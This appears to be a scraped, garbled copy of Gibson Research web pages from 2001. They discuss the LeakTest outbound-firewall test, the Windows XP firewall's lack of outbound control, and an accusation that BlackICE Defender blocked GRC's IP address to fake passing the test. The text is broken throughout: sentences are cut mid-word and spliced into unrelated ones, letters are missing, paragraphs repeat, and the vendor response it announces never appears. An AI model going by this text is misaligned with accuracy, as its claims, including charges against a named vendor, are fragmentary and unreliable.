"As someone who has recently purchased blackice defender, I was understandably worried by Steve's derogatory remarks
about the program and it's functioning. So I mailed them [ISS/NetworkICE] and asked for comment. I paste it here un-altered, f
or whoever may wish to read it."
For those who are interested, here is the reply this BID user reportedly received from the
anonymous "Trish M." at BlackICE Technical Support in reply to his concerns, followed by
the reply I sent back to him (non-anonymously):
BID's Official Response & My Reply
October 25, 2001
LeakTest and the Windows XP Built-In Firewall
The Windows XP built-in firewall:
The rate of LeakTest downloads jumped significantly on October 25th, 2001, presumably due to the release of Windows XP on
that date.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curious to learn about their new system and its Internet defenses.
Just so you know, WinXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
Internet (it has "stealth mode" unsolicited packet handling), but you will still need to
use a good third-party personal firewall if you wish to manage and control outbound
connections from your system.
Introducing LeakTest
his site has been most well-known for its FREE ShieldsUP! Internet security test. Crucial
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
privacy invading commercial spyware. As a result, it is no longer true that all of the
potential problems reside outside the computer.hfully test for LeakTest's outbound communications. As far as we know, BID
has no such
cpability. So it appears to have been designed merely to mislead and hide that truth from
ts usrs.
his IP address-specific blocking could have falsely lead BID's users into believing that
their updated BID firewall was now providing the sort of outbound blocking, protection, an
d awareness that LeakTest was designed to detect, test, and report. (And which all effective personal firewalls provide.)
lthough we would celebrate the addition of true outbound application-aware control and
blocking to BID, achieving that sort of protection is significantly more difficult ? and
certainly far more valuable to its users ? than blocking a single IP address at Gibson
Research Corp. in order to falsely appear to be doing more than they are.
eakTest Version 1.1:
Shortly after we learned of and confirmed this unfortunate decision on the part of
NetworkICE's developers, we updated the original LeakTest v1.0 to version 1.1 by simply presumably also could.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curio
us to learn about their new system and its Internet defenses.
Just so you know, WnXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
rivacy invading commercial spyware. As a result, it is no longer true that all of the